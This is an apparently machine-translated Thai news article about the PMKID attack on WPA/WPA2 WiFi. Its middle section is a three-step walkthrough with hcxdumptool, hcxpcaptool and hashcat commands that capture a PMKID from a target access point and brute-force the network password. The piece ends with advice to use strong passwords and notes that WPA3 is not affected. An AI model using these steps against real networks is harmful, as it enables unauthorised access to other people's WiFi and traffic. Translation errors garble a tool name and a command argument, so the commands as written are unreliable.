นักวิจัยด้านความปลอดภัยเพิ่งเปิดเผย เทคนิค การแฮ็ก WiFi ใหม่ ที่ทำให้ง่ายต่อการค้นหารหัสผ่าน WiFi ของเราเตอร์ที่ทันสมัยที่สุดในปัจจุบัน ค้นพบโดย Jens Steube (ชื่อเล่น “Atom”) ผู้พัฒนาเครื่องมือแฮ็กรหัสผ่านที่มีชื่อเสียง Hashcat - ในขณะที่วิเคราะห์มาตรฐานความปลอดภัย WPA3 ที่ออกใหม่ วิธีการนี้จะกำหนดเป้าหมายโปรโตคอลเครือข่ายไร้สาย WPA /WPA2 พร้อมคุณสมบัติโรมมิ่งโดยยึดตาม PMKID (Pairwise Master Key Identifier ).
วิธีการแฮ็ก WiFi ใหม่นี้ช่วยให้ผู้โจมตีสามารถดึงรหัสผ่านเข้าสู่ระบบ PSK (Pre-shared Key) เพื่อแฮ็กเข้าสู่เครือข่าย WiFi และดูกิจกรรมทางอินเทอร์เน็ต ก่อนหน้านี้ ผู้โจมตีต้องรอให้ใครสักคนเข้าสู่ระบบเครือข่ายและรับ EAPOL 4-way Authentication Handshake ซึ่งเป็นโปรโตคอลการตรวจสอบความถูกต้องของเครือข่าย แต่ด้วยวิธีการใหม่นี้ ผู้ใช้ไม่จำเป็นต้องอยู่บนเครือข่ายเป้าหมายอีกต่อไป เพียงแต่ต้องทำบน RSN IE (Robust Security Network Information Element) โดยใช้ EAPOL เดียว (Extensible Authentication Protocol over LAN) หลังจากนั้น ส่งคำขอจากจุดเข้าใช้งาน .
Robust Security Network เป็นโปรโตคอลที่สร้างการแลกเปลี่ยนที่ปลอดภัยผ่านเครือข่ายไร้สาย 802.11 และใช้ PMKID ซึ่งเป็นคีย์ที่จำเป็นในการสร้างการเชื่อมต่อระหว่างไคลเอนต์และจุดเข้าใช้งาน
วิธีแฮ็ก Wifi โดยใช้ PMKID
ขั้นตอนที่ 1:ผู้โจมตีใช้เครื่องมือ เช่น hcxdumptool (https://github.com/ZerBea/hcxdumptool) (v4.2.0 หรือใหม่กว่า) เพื่อขอ PMKID จากจุดเข้าใช้งานเป้าหมาย และวางเฟรมที่ได้รับลงในไฟล์
$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 --enable_status
ขั้นตอนที่ 2:การใช้เครื่องมือ hcxcaptool (https://github.com/ZerBea/hcxtools) เอาต์พุต (รูปแบบ pcapng) ของเฟรมจะถูกแปลงเป็นรูปแบบแฮชที่ Hashcat อนุมัติ
$ ./hcxpcaptool -z test.16800 ทดสอบ pcapng
ขั้นตอนที่ 3:ใช้เครื่องมือถอดรหัสรหัสผ่าน Hashcat (https://github.com/hashcat/hashcat) (v4.2.0 หรือสูงกว่า) เพื่อรับรหัสผ่าน WPA PSK เท่านี้ก็เสร็จสิ้น
$ ./hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'
นั่นคือรหัสผ่านของเครือข่ายไร้สายปลายทาง ระยะเวลาที่ใช้ขึ้นอยู่กับความยาวและความซับซ้อนของรหัสผ่าน
“ปัจจุบันเราไม่ทราบว่าวิธีนี้จะใช้ได้กับผู้จำหน่ายหรือเราเตอร์กี่ราย แต่เราคิดว่ามันจะทำงานบนเครือข่าย 802.11i/p/q/r ที่เปิดใช้งานการสลับเครือข่าย (เช่น เราเตอร์ส่วนใหญ่ในปัจจุบัน) ” Steube กล่าว
เนื่องจากการแฮ็กรหัสผ่านจะเกิดขึ้นเฉพาะเมื่อเครือข่ายเปิดใช้งานพอร์ตแล้ว และกำหนดให้ผู้โจมตีลองใช้รหัสผ่านผิดหลายครั้ง ผู้ใช้จึงได้รับการสนับสนุนให้ปกป้องเครือข่ายโดยใช้รหัสผ่านที่คาดเดายาก การแฮ็กประเภทนี้ใช้ไม่ได้กับโปรโตคอลความปลอดภัยเครือข่ายไร้สายรุ่นใหม่ WPA3 เนื่องจาก "โปรโตคอลการสร้างคีย์ใหม่ที่เรียกว่า Simultaneous Authentication of Equals (SAE)"
ดูเพิ่มเติม: